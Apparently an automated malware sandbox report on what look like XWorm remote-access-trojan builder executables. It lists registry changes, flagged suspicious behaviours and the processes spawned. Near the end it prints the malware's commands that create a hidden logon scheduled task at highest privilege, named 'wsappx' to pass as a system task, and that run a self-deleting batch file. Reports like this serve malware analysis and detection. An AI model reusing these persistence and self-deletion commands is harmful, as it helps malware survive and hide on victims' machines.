| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Downloads" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 = 720032004bbe5500f056a3ae200058574f524d2d7e322e5a49500000560009000400efbef056a2aef056a3ae2e0000000333020000001400000000000000000000000000000000fd0501580057006f0072006d002d0033002e0031002d006d00610069006e002e007a006900700000001c000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Desktop\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\System32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | C:\Windows\System32\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0400000000000000020000000300000001000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\builder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\0\0 = 7e00310000000000f056edae100054454d50315f7e312e5a49500000620009000400efbef056edaef056edae2e00000078db010000000800000000000000000000000000000089849600540065006d00700031005f00580057006f0072006d002d0033002e0031002d006d00610069006e002e007a006900700000001c000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 010000000200000000000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\builder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | C:\Windows\System32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Users\Admin\Desktop\builder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\System32\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XHVNC.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Process | Command line |
| C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe |
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\dwm.exe | "dwm.exe" |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts |
| C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo |
| C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service |
| C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -s W32Time |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com |
| C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer |
| C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks |
| C:\Windows\sysmon.exe | C:\Windows\sysmon.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22319758,0x7ffe22319768,0x7ffe22319778 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:2 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1 |
| C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe | "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe" |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3636 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4648 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3936 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4916 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4876 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5736 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5876 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5976 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5220 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5132 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1 |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8 |
| C:\Windows\System32\rundll32.exe | C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding |
| C:\Users\Admin\Desktop\XWorm-RAT-V2.1-builder.exe | "C:\Users\Admin\Desktop\XWorm-RAT-V2.1-builder.exe" |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc |
| C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe | "C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe" |
| C:\Users\Admin\Desktop\builder.exe | "C:\Users\Admin\Desktop\builder.exe" |
| C:\Program Files\Google\Chrome\Application\chrome.exe | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2424 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:2 |
| C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe" |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat |
| C:\Windows\system32\tasklist.exe | Tasklist /fi "PID eq 1668" |
| C:\Windows\system32\find.exe | find ":" |
| C:\Windows\system32\timeout.exe | Timeout /T 1 /Nobreak |
| C:\Users\Static\wsappx.exe | "wsappx.exe" |
| C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -pss -s 404 -p 3724 -ip 3724 |
